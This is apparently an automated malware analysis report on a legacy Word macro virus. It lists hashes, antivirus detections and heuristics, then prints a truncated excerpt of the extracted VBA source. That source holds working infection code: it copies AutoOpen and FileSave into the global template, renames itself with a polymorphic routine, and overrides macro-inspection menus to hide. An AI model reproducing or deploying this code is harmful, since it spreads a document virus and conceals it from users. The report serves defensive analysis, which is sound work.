Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 aec5da630a13bcbd…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 46.0 KB
Created: 1999-06-13 19:42:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 84dfca191bc820a6983372a34c83ba54
SHA-1: 05e03fd9134493e0bb37724ce88c64a77a0ec005
SHA-256: aec5da630a13bcbd8ca8e9d1ca704eefa6d5eb2c9ac43624ae66d997225deeb9
Risk Score: 220

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample exhibits characteristics of a legacy macro virus, with high-severity firings for OLE_LEGACY_WORDBASIC_MACRO_VIRUS and OLE_VBA_AUTOOPEN. The VBA macro code attempts to copy its AutoOpen and FileSave routines to the global template, a common technique for macro malware to achieve persistence and spread. The ClamAV detections further confirm its malicious nature.

Heuristics (4)

  • ClamAV: Doc.Trojan.Minimal-68 (severity: critical; rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Minimal-68
  • Legacy WordBasic macro-virus markers (severity: high; rule: OLE_LEGACY_WORDBASIC_MACRO_VIRUS)
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro, or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • VBA macros detected (severity: medium; 1 related finding; rule: OLE_VBA_MACROS)
    Document contains VBA macro code
  • AutoOpen macro (severity: high; rule: OLE_VBA_AUTOOPEN)
    AutoOpen macro

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 39218 bytes
SHA-256: 76aaf4e9786db010e48a6f9a1ebaef871f4644a7ec1646c94f6f684dc9067713
Detection
ClamAV: Doc.Trojan.Rut-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "FileSave"

Public Sub MAIN()
Attribute MAIN.VB_Description = "Saves the active document or template"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.FileSave.MAIN"
Dim I
Dim F$
Dim G$
Dim H$
Dim I_$
ReDim AI__$(0)
Dim J
Dim Rnd_$
Dim K
Dim B1$
Dim B2$
Dim B3$
Dim B4$
Dim B5$
Dim B6$
Dim B7$
Dim B8$
Dim B9$
Dim B0$
Dim Y$
Dim T
Dim dlg As Object
    WordBasic.DisableInput 1
    On Error GoTo -1: On Error GoTo ErrFClose
    Dim Allready: Let Allready = 0
    
    '** Check macros ID in GlobalTemplate
     For I = 1 To WordBasic.CountMacros(0)
      If Len(WordBasic.[MacroName$](I, 0)) = 20 Then
        F$ = Mid(WordBasic.[MacroName$](I, 0), 20, 1)
        G$ = Mid(WordBasic.[MacroName$](I, 0), 1, 1)
        H$ = Mid(WordBasic.[MacroName$](I, 0), 19, 1)
        I_$ = Mid(WordBasic.[MacroName$](I, 0), 2, 1)
        If (F$ = G$) And (H$ = I_$) Then
         Let Allready = -1
        End If
      End If
     Next I
    
    If Not Allready Then
    '** Done when the global template is not yet infected
       WordBasic.MacroCopy WordBasic.[FileName$]() + ":AutoOpen", "Global:AutoOpen"
       WordBasic.MacroCopy WordBasic.[FileName$]() + ":FileSave", "Global:FileSave"

    '** Polymorphic engine
       ReDim AI__$(11)
       For J = 1 To WordBasic.CountMacros(1)
       If Len(WordBasic.[MacroName$](J, 1)) = 20 Then
         F$ = Mid(WordBasic.[MacroName$](J, 1), 20, 1)
         G$ = Mid(WordBasic.[MacroName$](J, 1), 1, 1)
         H$ = Mid(WordBasic.[MacroName$](J, 1), 19, 1)
         I_$ = Mid(WordBasic.[MacroName$](J, 1), 2, 1)
         If (F$ = G$) And (H$ = I_$) Then
              Rnd_$ = WordBasic.[MacroName$](J, 1)
              'MsgBox(MacroName$(J, 1))
              For K = 1 To 10
                AI__$(K) = String(1, num)
              Next K
              B1$ = AI__$(1): B2$ = AI__$(2)
              B3$ = AI__$(3): B4$ = AI__$(4)
              B5$ = AI__$(5): B6$ = AI__$(6)
              B7$ = AI__$(7): B8$ = AI__$(8)
              B9$ = AI__$(9): B0$ = AI__$(10)
              Y$ = ""
              For T = 1 To 10
                Y$ = AI__$(T) + Y$
              Next T
              WordBasic.MacroCopy WordBasic.[FileName$]() + ":" + Rnd_$, "Global:" + Y$ + B1$ + B2$ + B3$ + B4$ + B5$ + B6$ + B7$ + B8$ + B9$ + B0$

              '* Stealth mode
              WordBasic.MacroCopy WordBasic.[FileName$]() + ":" + Rnd_$, "Global:ToolsMacro"
              WordBasic.MacroCopy WordBasic.[FileName$]() + ":" + Rnd_$, "Global:ViewToolBars"
              WordBasic.MacroCopy WordBasic.[FileName$]() + ":" + Rnd_$, "Global:FileTemplates"
              WordBasic.MacroCopy WordBasic.[FileName$]() + ":" + Rnd_$, "Global:ToolsCustomize"
              WordBasic.SaveTemplate
         End If
       End If
      Next J


    Else
         '** Done when the Global template is already infected
         For J = 1 To WordBasic.CountMacros(0)
          If Len(WordBasic.[MacroName$](J, 0)) = 20 Then
          F$ = Mid(WordBasic.[MacroName$](J, 0), 20, 1)
          G$ = Mid(WordBasic.[MacroName$](J, 0), 1, 1)
          H$ = Mid(WordBasic.[MacroName$](J, 0), 19, 1)
          I_$ = Mid(WordBasic.[MacroName$](J, 0), 2, 1)
           If (F$ = G$) And (H$ = I_$) Then
             'MsgBox("Ialah  " + MacroName$(J, 0))
             Rnd_$ = WordBasic.[MacroName$](J, 0)
             WordBasic.MacroCopy "Global:FileSave", WordBasic.[FileName$]() + ":FileSave"
             WordBasic.MacroCopy "Global:AutoOpen", WordBasic.[FileName$]() + ":AutoOpen"
             WordBasic.MacroCopy "Global:" + Rnd_$, WordBasic.[FileName$]() + ":" + Rnd_$

             WordBasic.FileSummaryInfo Update:=1
             Set dlg = WordBasic.DialogRecord.FileSummaryInfo(False)
             WordBasic.CurValues.Fi
... (truncated)